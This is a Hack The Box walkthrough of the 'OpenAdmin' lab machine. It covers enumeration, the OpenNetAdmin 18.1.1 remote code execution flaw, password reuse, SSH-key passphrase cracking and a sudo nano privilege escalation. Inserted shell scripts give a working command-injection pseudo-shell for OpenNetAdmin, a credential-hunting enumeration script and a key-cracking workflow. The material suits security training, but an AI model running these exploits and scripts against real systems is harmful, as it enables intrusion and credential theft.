HTB - OpenAdmin without Metasploit
Intro
Why you also need to patch your “applications”, and not just your services.
Target
Recon
Again, this is an HTB box, so recon is mainly active, and to me active recon is basically enumeration.
Still, there are a few passive things we can check:
- Name of the box: OpenAdmin;
- OS type: Linux;
- Hints given on the HTB website, in the information section.
Enum
As always, we start with an nmap scan.
We find two services: SSH and Apache, both on their standard ports (22 and 80). I like to run searchsploit
against every service and version I find, to see whether there is any known vulnerability. In general, SSH isn't something I'll attack right away; it is more of a “last chance” path, via brute force.
Web scanning
In our case, the web server is running Apache, but that version doesn't seem vulnerable. So, let's fire up nikto
and dirbuster.
Dirbuster finds an interesting directory, “ona”. Browsing to it, we discover that it is running OpenNetAdmin version 18.1.1, which is outdated and probably vulnerable…
Indeed, after a quick search, we discover that it is vulnerable to Remote Code Execution (RCE), one of the most dangerous classes of vulnerability we could hope to find. Awesome!
Exploitation
Getting initial shell
The vuln in question can be found here: https://www.exploit-db.com/exploits/47691. It is a short script that gives you command execution on the remote machine, wrapped up as a pseudo-shell.
Unfortunately, this shell only runs as www-data
, the default Apache user, whose login shell is /sbin/nologin
. Still, we can look around. I usually start by checking which files I have access to.
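As an added example (this is neither the original post's code nor the exploit-db script itself), here is a minimal shell helper that reproduces the technique the public exploit relies on: the OpenNetAdmin ping tooltip, reached through an xajax POST, can be made to run a shell command, and the command's output is recovered from the HTML response by wrapping it between two marker lines. The request parameters are taken from the public exploit, not from this write-up; the target URL is a placeholder.

```shell
#!/bin/sh
# Added example: minimal pseudo-shell for the OpenNetAdmin 18.1.1 RCE.
# The injection vector (xajax "tooltips"/"ping" request) and the BEGIN/END
# output markers follow the public exploit; ONA_URL is a placeholder.
ONA_URL="${ONA_URL:-http://TARGET/ona/}"

# Build the POST body: the command is injected after "ip=>" and its output is
# wrapped in BEGIN/END lines so it can be picked out of the HTML response.
ona_payload() {
  cmd="$1"
  printf '%s' "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping"
}

# Keep only the lines between the BEGIN and END markers read from stdin.
ona_extract() {
  sed -n '/BEGIN/,/END/p' | sed -e '1d' -e '$d'
}

# Run one command on the target and print its output.
ona_exec() {
  curl --silent --data "$(ona_payload "$1")" "$ONA_URL" | ona_extract
}

# Interactive loop, e.g. `ONA_URL=http://TARGET/ona/ sh ona_shell.sh`.
ona_shell() {
  while printf '$ ' && IFS= read -r line; do
    [ -n "$line" ] && ona_exec "$line"
  done
}
```

Two caveats worth knowing before you rely on it: the command is sent raw in the body, so anything containing `&` or `+` must be URL-encoded first, and a command whose own output contains the word END will be truncated by the marker extraction.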
Let's check who has access to sudo.
I also like to check which users are on the system and see whether I can read any files inside their home folders.
And of course, in our case, explore the web root.
Doing so, we discover two users, joanna
and jimmy
, and an interesting set of credentials inside /var/www/html/local/ona/config
.
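The checks above (real users, readable home directories, credentials lying around in the web root, sudo rights) are worth scripting, since you repeat them on every box from every low-privileged shell. The following script is an added example, not part of the original write-up: every function takes its paths as arguments so it can be tried against constructed files, and the config file it is meant to catch is an invented illustration, not the box's real one.

```shell
#!/bin/sh
# Added example: quick post-exploitation checks from a low-privileged shell.
# Every function takes paths as arguments so it can be tested offline;
# the real-world defaults are /etc/passwd, /home and /var/www.

# Accounts that can actually log in: uid 0 or uid >= 1000 with a real shell.
login_users() {
  awk -F: '($3 == 0 || $3 >= 1000) && $7 !~ /(nologin|false)$/ { print $1 }' "${1:-/etc/passwd}"
}

# Home directories we can enter, and the files inside them that we can read.
readable_home_files() {
  for home in "${1:-/home}"/*; do
    [ -d "$home" ] && [ -r "$home" ] && [ -x "$home" ] || continue
    find "$home" -type f -readable 2>/dev/null
  done
}

# Lines in web-root config files that look like credentials.
# /dev/null is passed so grep always prefixes the file name.
config_secrets() {
  find "${1:-/var/www}" -type f \
    \( -name '*.php' -o -name '*.inc' -o -name '*.conf' -o -name '*.ini' \) \
    -exec grep -niE 'passw|secret|api_?key|token' /dev/null {} + 2>/dev/null
}

# Sudo rights; -n never prompts, so this cannot hang a non-interactive shell.
sudo_rights() {
  sudo -n -l 2>&1
}

# Run everything with the real defaults.
enum_all() {
  echo "[*] users with a login shell:"; login_users
  echo "[*] readable files under /home:"; readable_home_files
  echo "[*] credential-looking lines under /var/www:"; config_secrets
  echo "[*] sudo:"; sudo_rights
}
```

On this box, `login_users` is what surfaces jimmy and joanna, and `config_secrets` is what surfaces the ONA configuration; the same password then turned out to work for SSH, which is the first thing to try with any credential you find.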
It turns out that the password in this file is also jimmy's SSH password (plain password reuse). We now have a real bash shell, in a real terminal, with tab completion, hurray!
Once again, we check the usual things, such as which files we own and what our sudo rights are.
So, no sudo rights for us. However, we discover a second website that only listens on localhost (port 52846). This website is very interesting: reading its source, we can see that once we are logged in as jimmy, it will hand us joanna's SSH private key.
I decided to create an SSH tunnel to that port, and to modify the login page in order to get rid of the authentication check.
We can now browse to 127.0.0.1:52846 and log in with jimmy / plop.
And bingo! We get joanna's key, with an extra hint:
Don’t forget your “ninja” password
Of course, joanna's key is encrypted… We save it as id_joanna and convert it into a crackable hash.
Now that we have the hash, time to crack it; the hint about a “ninja” password is a good reason to try the matching wordlist entries first.
We finally have the passphrase of joanna's SSH key, and we can now connect to the server as her!
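The steps from the tunnel to the login, as one added shell script (not code from the original post). The target host name, the wordlist path and the ssh2john location (it ships with John the Ripper, sometimes as /usr/share/john/ssh2john.py; the write-up does not name the tools it used) are assumptions; the tunnel port 52846 is the one from the write-up. Everything that touches the target is a function you call by hand; the only part that runs without a target is `key_protection`, the check that tells you whether a saved key actually needs a passphrase and which cipher protects it, before you spend time cracking.

```shell
#!/bin/sh
# Added example: tunnel to the internal site, inspect joanna's key, crack it, log in.
# TARGET, WORDLIST and the ssh2john binary are assumptions, not taken from the post.
TARGET="${TARGET:-target.htb}"
LOCAL_PORT=52846
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"

# Forward local 52846 to the site that only listens on the box's loopback,
# then browse to http://127.0.0.1:52846/ from the attacking machine.
tunnel_internal_site() {
  ssh -N -f -L "${LOCAL_PORT}:127.0.0.1:${LOCAL_PORT}" "jimmy@${TARGET}"
}

# Report how a saved private key is protected: the cipher named in a classic
# PEM "DEK-Info" header, "openssh" for the newer format (its KDF settings are
# inside the base64 body, so use `ssh-keygen -y -P '' -f key` to tell if it
# is encrypted), or "none" for an unprotected PEM key.
key_protection() {
  if grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
    sed -n 's/^DEK-Info: \([^,]*\),.*/\1/p' "$1"
  elif grep -q '^-----BEGIN OPENSSH PRIVATE KEY-----' "$1"; then
    echo openssh
  else
    echo none
  fi
}

# Convert the key to john's format and crack it. The site hinted at a "ninja"
# password, so try the matching wordlist lines first, then the whole list.
crack_key() {
  key="$1"
  ssh2john "$key" > "$key.hash"
  grep -i ninja "$WORDLIST" > "$key.wl"
  john --wordlist="$key.wl" "$key.hash" || true
  john --wordlist="$WORDLIST" "$key.hash" || true
  john --show "$key.hash"
}

# Log in as joanna; ssh refuses a key file that other users can read.
login_as_joanna() {
  chmod 600 "$1"
  ssh -i "$1" "joanna@${TARGET}"
}
```

Usage from the attacking machine: `tunnel_internal_site`, fetch the key through the tunnel and save it as id_joanna, `key_protection id_joanna` (expect a cipher name), `crack_key id_joanna`, then `login_as_joanna id_joanna` and enter the recovered passphrase.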
PrivEsc
As usual, we do all our basic checks. Doing so, we notice that:
- We can read the user.txt flag;
- We can run sudo /bin/nano /opt/priv
without a password.
Reading the root flag, which on HTB is always located in /root/root.txt
, is then a simple matter of running nano
as root (with sudo
), pressing ^R
(read file) and then ^X
(execute command) to cat
the flag file. Note that this prompt runs whatever command you type as root, so the same trick gives you a root shell, not just the flag.
We now have root.txt
!
Outro
As we have just seen, one can obtain root access to a machine through a “third-party” application while the rest of the system is up to date (here, password reuse and an over-permissive sudo rule did the rest). So, make sure to keep everything updated, not just the OS packages!